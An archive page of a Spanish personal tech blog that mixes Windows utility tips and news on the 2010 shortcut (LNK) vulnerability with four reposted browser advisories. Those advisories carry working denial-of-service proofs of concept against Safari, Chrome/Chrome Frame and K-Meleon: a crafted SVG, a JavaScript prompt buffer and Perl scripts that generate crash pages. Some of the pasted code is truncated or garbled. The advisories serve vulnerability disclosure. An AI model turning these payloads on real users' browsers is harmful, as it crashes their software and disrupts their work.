Archive for the 'Windows' Category

No os preocupéis, sigo vivo !

Comentaros que aunque no me veáis escribir mucho por aquí ello tiene un signifcado; me estoy centrando más en un blog que comencé hace unos años en forma de proyecto y estoy dejando un poco de lado este, puesto que este es más de carácter personal y aquel más de carácter general por ello publico todo lo relacionado con la informática y algún que otro tema offtopic.

Click sobre la imágen para acceder 🙂

Complete Internet Repair, solución a los problemas de conexión

Leyendo ghacks descubro una sencilla pero completa utilidad que se encargará de hacer las comprobaciones pertinentes por nosotros. Se trata de Complete Internet Repair, un programa gratuíto, de muy poco peso y que además es totalmente portable.

Según evoluciona la web y nuestra forma de vida nos vemos más y más ligados a Internet de modo que tan sólo con una conexión a la red es posible acceder a datos que de ninguna otra forma llevaríamos encima, datos en muchas ocasiones críticos.

Un buen día llegas a casa y te dispones a mirar tu correo cuando de repente notas algo raro. La página tarda en cargar. No pasa nada, seguro que es normal. Tras más de 20 segundos esperando, nuestras peores sospechas se confirman: no hay Internet. Entonces por orden realizamos una batería de pruebas para intentar dar con el problema.

Complete Internet Repair nos ayuda con ellas y entre otras cosas es capaz de realizar las siguientes acciones:

  • Resetear el protocolo TCP/IP
  • Reparar Winsock
  • Renovar la conexión a Internet
  • Renovar la caché DNS
  • Resetear la configuración del Firewall de Windows
  • Reparar las conexiones SSL
  • Restaurar el archivo hosts
  • Reparar los equipos del grupo de trabajo

El uso de la aplicación es muy sencillo. Basta con ejecutar y seleccionar las acciones a realizar de la lista, de manera individual o todas a la vez. Tras iniciar las operaciones podremos ir leyendo el estado de las mismas mediante en la misma ventana mediante un completo log.

Seguir leyendo ‘Complete Internet Repair, solución a los problemas de conexión’

Safari for windows Invalid SGV text style Webkit.dll DoS

###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Afectado: http://www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como «image.svg» y ábrelo con Safari, mirad como se añaden algunos píxeles «extra» en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version=»1.0″?>
<svg xmlns=»http://www.w3.org/2000/svg» width=»200″ height=»200″ version=»1.1″>
<defs>
<mask id=»crash»>
<polygon points=»155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935″
transform=»matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)»
style=»fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1″ />
</mask>
</defs>

<g mask=»url(#crash)» style=»font-family:Verdana; font-size: 10pt; fill:red;»>
<text x=»80″ y=»80″ style=»font-size:111000000pt; fill:pink;»>Safari</text>
<text x=»0″ y=»130″ style=»font-size: 60pt; fill:pink;»>Now</text>
<text x=»20″ y=»190″ style=»font-size: 60pt; fill:pink;»>Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)

thz Lost 😉

Google Chrome and Chrome frame Prompt DoS

###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de «mensajes de alerta» cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas 🙂

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
«window manager button» and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=»X-UA-Compatible» content=»chrome=1″>
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost 😉

Actualiza tu sistema con Update Checker

Y como el fin de semana puede ser muy largo (o muy corto, depende de cada uno) quizá alguno piense en utilizar un par de huecos entre playa y paseo para poder actualizar su sistema. La tarea siempre se hace larga cuando tenemos que revisar todos los programas instalados pero Update Checker puede hacer ésta pesadez por ti.

Update Checker es un programa muy sencillo creada por el portal de descargas FileHippo que nos comprobará todos y cada uno de los programas instalados en el ordenador y, utilizando su base de datos, nos alertará de cuales tenemos obsoletos y un enlace para su descarga desde la página de descargas.

Por supuesto no están soportados todos los programas existentes aunque sí la mayoría de los más conocidos y utilizados. Sólo tenemos que darnos una vuelta por FileHippo para darnos cuenta de que sus bases de datos son lo suficientemente amplias para dar cobertura a la inmensa cantidad de usuarios medios.

La descarga es extremadamente ligera (100kb) así que no tardéis en pasarle este scanner a vuestros PC’s y tenerlos siempre lo más frescos posible.

Seguir leyendo ‘Actualiza tu sistema con Update Checker’

Safari for windows Long link DoS

############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href=»very long URL»>click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long «a href» Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print «Usage: $0 <archivo.html>\n»;

}

$cabecera = «<html>» . «\n»;
$payload = «<a href=\»about:neterror?e=connectionFailure&c=» . «/» x 1028135 . «\»>click here if you can :)</a>» . «\n»;
$fin = «</html>»;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
——————
thz Lost 😉

K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros ‘c’ ‘d’ si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; «haz clic aquí» o mediante window.location.replace url (‘muy largo’) o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################

################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long «a href» Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print «Usage: $0 <archivo.html>\n»;

}

$cabecera = «<html>» . «\n»;
$payload = «<a href=\»about:neterror?e=connectionFailure&c=» . «/» x 1028135 . «\»>click here if you can :)</a>» . «\n»;
$fin = «</html>»;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
————-
thz Lost 😉

Microsoft publica parche para grave vulnerabilidad

La semana pasada posteé sobre una vulnerabilidad en la forma de mostrar los iconos de accesos directos en Windows, que permite la ejecución de código malicioso con sólo abrir una carpeta o un sitio web preparado para ello, e incluso ustedes nos informaron sobre la aparición de algunos casos. Como esto fue aprovechado por diversas familias de virus, Microsoft decidió adelantar la publicación del parche al día de hoy, para disminuir los riesgos de infección.

Esta actualización llega fuera del ciclo habitual, cuya próxima tanda estaba prevista para el martes 10 de agosto, porque la compañía detectó un aumento importante en los intentos de ataque y su expansión a nuevas zonas geográficas. La información proviene de productos como Microsoft Secutiry Essentials que, al igual que las soluciones de otros fabricantes, ya dispone de firmas actualizadas.

Las correcciones son distribuidas a través de la página Windows Update y las actualizaciones automáticas. Como esto afecta a gran parte de las versiones del sistema operativo, incluyendo varias que ya no cuentan con soporte (anteriores a XP SP3), es probable que la mayoría de los usuarios deba instalarlas.

Si aplicaron la solución provisoria Fix It, que impide mostrar las imágenes que representan a cada atajo, podrán quitarla luego del proceso y recuperar la funcionalidad habitual.

Seguir leyendo ‘Microsoft publica parche para grave vulnerabilidad’

Cómo protegerse del “exploit de los accesos directos”

La semana pasada, surgió una de esas noticias que nos ponen los pelos de punta: una vulnerabilidad en Windows, permite que accesos directos infectados inicien ficheros DLL maliciosos, con sólo abrir la carpeta en cuestión o cargar páginas web y documentos preparados para ello. Y pese a su confirmación por parte de Microsoft, todavía no existe un parche que la resuelva.

El problema está relacionado a la manera en que el sistema operativo muestra los iconos de archivos .lnk o .pif. Aunque el punto de entrada más común es un pen drive, inhabilitar la reproducción automática no lo evita. Esto afecta a todas las versiones de Windows, incluyendo las declaradas como obsoletas por la compañía.

Entonces… ¿cómo protegerse? Mientras aguardamos por la llegada de una actualización, se desarrollaron distintas herramientas que reducen las chances de infección:

  • Microsoft Fix It ofrece un sencillo ejecutable que modifica el registro para desactivar los íconos de los accesos directos. Aunque no signifique un trastorno para muchos, sí deberán tener en cuenta si algún usuario del equipo depende de la imagen para identificar el programa que desea iniciar.
  • Sophos Windows Shortcut Exploit Protection Tool realiza por su cuenta la carga de los atajos, bloqueando cualquiera que parezca dañino y ofreciendo alertas.
  • TrendMicro SysClean y la herramienta en línea HouseCall se encargan de la tarea más engorrosa: la limpieza del virus Stuxnet, uno de los que ya aprovecha este fallo.

Como consejo adicional, antes de usar cualquier dispositivo USB, es conveniente pasarlo por un antivirus. Lógicamente, es necesario tener actualizadas tanto la aplicación como las firmas de virus, para que sea verdaderamente efectiva.

Seguir leyendo ‘Cómo protegerse del “exploit de los accesos directos”’

Identifica qué quieren decir los pitidos de tu ordenador

Es muy normal que se de el caso de que un ordenador no arranque y no sepamos muy bien porque. Ni si quiera se ve nada en la pantalla, simplemente sale un pitido desagradable de dentro y nada más.

Gracias a Rizone Beep Codes Viewer podremos comprender lo que significan esos pitidos y si es posible solucionar el problema. Esta aplicación solo funciona para Windows y no requiere instalación. Desgraciadamente está íntegramente en inglés, así que si no sabemos este idioma no podremos interpretar lo que quiere decir cada pitido.

Para saber lo que quieren decir esa agradable melodía que sale de nuestro ordenador primero tendremos que identificar que tipo de BIOS tenemos, entre AMI, AWARD, IBM o Phoenix. Esto lo podemos mirar tanto en el manual de la placa como en la misma placa base, que seguramente tendrá una pegatina donde lo ponga. Ahora solo seleccionamos que tipo de sonido hace y nos aparecerá la descripción del error.

Sinceramente me parece una aplicación imprescindible, que todos los que en mayor o menos medida nos dedicamos a esto debemos tener a mano. Además, nunca se sabe cuando nuestro propio ordenador se va a ir al garete y si queremos ahorrarnos el dinero que nos puede costar llamar a un servicio técnico podemos empezar por identificar nosotros mismos que problema tenemos.

Descarga | Rizone Beep Codes Viewer

Seguir leyendo ‘Identifica qué quieren decir los pitidos de tu ordenador’


Blog Stats

  • 620.807 visitas

RSS

Feed
May 2024
L M X J V S D
 12345
6789101112
13141516171819
20212223242526
2728293031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker